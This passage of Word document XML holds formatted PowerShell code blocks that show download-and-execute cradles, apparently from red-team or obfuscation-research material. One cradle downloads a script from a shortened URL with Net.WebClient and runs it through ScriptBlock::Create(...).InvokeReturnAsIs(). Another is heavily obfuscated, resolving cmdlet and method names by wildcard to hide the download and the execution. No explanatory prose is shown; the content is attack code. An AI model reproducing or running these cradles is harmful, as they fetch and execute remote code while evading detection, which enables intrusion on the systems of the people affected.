        <w:t>([</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IO.File</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]::ReadAllBytes(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Default_File_Path.ps1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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForEach-Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>})))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340ED836" w14:textId="77777777" w:rsidR="0031379D" w:rsidRPr="00CA7FE4" w:rsidRDefault="0031379D" w:rsidP="0031379D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New-Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Net.WebClient).DownloadFile(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http://bit.ly/L3g1tCrad1e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Default_File_Path.ps1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);[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ScriptBlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]::Create((</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-Join</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IO.File</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]::ReadAllBytes(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Default_File_Path.ps1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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForEach-Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}))).InvokeReturnAsIs()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38895B5F" w14:textId="77777777" w:rsidR="0031379D" w:rsidRPr="00CA7FE4" w:rsidRDefault="0031379D" w:rsidP="0031379D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/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Set-Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HJ1 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http://bit.ly/L3g1tCrad1e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;SI Variable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">0W 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Net.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Variable:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gH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Default_File_Path.ps1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 xml:space="preserve">;ls </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-*</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set-Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>igZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$ExecutionContext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.InvokeCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.((</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$ExecutionContext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.InvokeCommand.PsObject.Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_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.Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k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>like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*Cm*t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}).Name).Invoke(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$ExecutionContext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.InvokeCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.((</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$ExecutionContext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.InvokeCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_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.Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k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>like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*om*e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}).Name).Invoke(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*w-*ct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c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$TRUE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c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>))(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Get-ChildItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Variable:0W).Value);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set-Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> J ((((</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Get-Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>igZ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color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ValueOn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k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>like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*w*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*le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CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}).Name);(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Get-Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>igZ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color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ValueOn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ChildItem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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Variable:J</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).Value).Invoke((</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Get-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Variable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HJ1).Value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color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(GV </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).Value);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">( 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''</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IsNormalized.ToString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>()[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>13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c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-Join</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-pds"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-Join</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[]](CAT </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enco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c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GV </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
